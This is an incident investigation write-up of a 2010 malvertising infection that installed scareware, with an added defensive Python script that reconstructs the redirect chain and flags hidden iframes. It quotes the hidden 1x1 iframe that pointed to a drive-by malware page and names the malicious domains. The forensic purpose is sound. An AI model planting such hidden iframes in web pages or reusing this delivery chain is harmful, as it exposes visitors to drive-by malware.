Infected PC Investigation Summary 6/8/10 infection
The story you are about to hear is true. Only the names have been changed to protect the innocent.
Hello,
A user’s PC has been infected with a rogue antispyware called AV Security Suite. It keeps coming up with bogus viruses and has basically taken over the system. The network has been disconnected; the incident started yesterday, 6/08/10, around 4:25 pm. The user has access to level 2 protected info, but does not keep any of that info on her PC.
Thanks,
Tech Guy
• User visited a legitimate site, medical-dictionary.thefreedictionary.com
• The site served up advertising through interclick.com
• One of the advertising pulls came from a known "malvertising" domain, h7.ch.adtech.com.niklip.com. Malvertising domains serve up obfuscated JavaScript that redirects browsers to malware "check-in" sites.
• Immediately after this pull, a request was made to a known malware "check-in" site, statsoplex.co.cc, which returned a hidden iframe. Malware check-in sites redirect browsers to SEO (Search Engine Optimization) exploit drive-by sites.
The iframe
<html>
<body>
<iframe src="http://aiosstatsungenett.com/info/nag3.html" style="visibility:hidden;" width="1" height="1"></iframe>
</body>
</html>
The iframe loaded a scareware A/V page from a known SEO Exploit drive-by site, aiosstatsungenett.com. The scareware page, nag3.html, was loaded with obfuscated malware JavaScript.
Two seconds later, the JavaScript that came from aiosstatsungenett.com initiated a 289K application stream to the browser from 188.65.x.x. The application stream turned out to be an infected SWF. An infected PDF was also downloaded.
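Reconstructing that chain from proxy logs is the defender's side of the story. The following is an added example, not part of the original presentation: it replays the hops above with constructed log lines (the paths other than /info/nag3.html are made up, and 188.65.x.x is the slide's own redacted address), walks the Referer headers backwards from the payload download to the page the user actually visited, and flags the hidden 1x1 iframe in the check-in response quoted on the slide.

```python
from html.parser import HTMLParser

# Constructed proxy log (not from the original investigation) replaying the referral chain
# the slides describe. Fields: time client url referer content-type.
PROXY_LOG = """\
16:25:01 10.0.0.5 http://medical-dictionary.thefreedictionary.com/ - text/html
16:25:02 10.0.0.5 http://interclick.com/serve.js http://medical-dictionary.thefreedictionary.com/ text/javascript
16:25:02 10.0.0.5 http://h7.ch.adtech.com.niklip.com/ad.js http://interclick.com/serve.js text/javascript
16:25:03 10.0.0.5 http://statsoplex.co.cc/in.php http://h7.ch.adtech.com.niklip.com/ad.js text/html
16:25:03 10.0.0.5 http://aiosstatsungenett.com/info/nag3.html http://statsoplex.co.cc/in.php text/html
16:25:05 10.0.0.5 http://188.65.x.x/load.php http://aiosstatsungenett.com/info/nag3.html application/x-shockwave-flash
"""

# The check-in response quoted on the slide (tag spacing repaired).
CHECKIN_HTML = ('<html><body><iframe src="http://aiosstatsungenett.com/info/nag3.html" '
                'style="visibility:hidden;" width="1" height="1"></iframe></body></html>')

def parse_log(text):
    """One dict per request line; a '-' referer becomes None."""
    rows = []
    for line in text.splitlines():
        ts, client, url, ref, ctype = line.split()
        rows.append({"ts": ts, "url": url, "referer": None if ref == "-" else ref, "ctype": ctype})
    return rows

def referral_chain(rows, final_url):
    """Follow Referer headers backwards from the payload to the page the user actually visited."""
    by_url = {r["url"]: r for r in rows}
    chain, url = [], final_url
    while url in by_url and url not in chain:  # stop at the first hop or on a loop
        chain.append(url)
        url = by_url[url]["referer"]
    return chain[::-1]

class HiddenIframeFinder(HTMLParser):
    """Collect iframe src values that are hidden by style or sized 0x0/1x1."""
    def __init__(self):
        super().__init__()
        self.hits = []
    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = dict(attrs)
        style = (a.get("style") or "").replace(" ", "").lower()
        tiny = a.get("width") in ("0", "1") and a.get("height") in ("0", "1")
        if "visibility:hidden" in style or "display:none" in style or tiny:
            self.hits.append(a.get("src"))

def find_hidden_iframes(html):
    parser = HiddenIframeFinder()
    parser.feed(html)
    return parser.hits
```

Running referral_chain on the SWF download yields the six hops in the order the user's browser took them, which is the timeline the slides reconstruct by hand.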
The Malware Distribution Site
• Reverse lookup on 188.65.x.x
• protect-ware.com
• "Antispyware Soft - Powerfull PC Protection !"
Interesting factoid
• All 4 of the above domains were registered within a month of the infection via a Chinese registrar, todaynic.com.
• Registrant addresses were in Lithuania, Russia, and Pennsylvania.
• IP addresses were in Austria, Belgium, and Sweden.
Another interesting factoid
• A study by Avast! (A/V software) found that for every 1 infected adult site there were 99 other legitimate sites that were infected.
Sites that are known to have been referring clients to malicious advertising services related to this incident
• ad.ca.doubleclick.net
• ad.doubleclick.net
• canada.com
• dailymail.co.uk
• dailyradar.com
• edmontonjournal.com
• financialpost.com
• google.com
• history.com
• montrealgazette.com
• nasdaq.com
• orbitz.com
• sportsfanlive.com
• tennessean.com
• thestarphoenix.com
• usatoday.com
• vancouversun.com
• windsorstar.com
The PC
• XP SP3, fully patched
• McAfee 8.7 with current engine and signatures
• Updated Adobe Reader
The Malware
• All JavaScript was obfuscated
• The payload was downloaded without user interaction
• Primarily scareware: it attempted to convince the user that Antivirus Soft could disinfect and protect her PC
• Pretty convincing product image and System Tray icon. Would have fooled most users.
The Malware
• When the malware was uploaded to virustotal.com, only 3/41 products detected it (McAfee did not detect)
• The next day, the detection rate increased to 19/41, this time including McAfee
Results
• No indication from firewall logs that this was anything more than an attempt to get the user to buy useless, and likely infected, software
• PC was wiped, reloaded, and returned to the user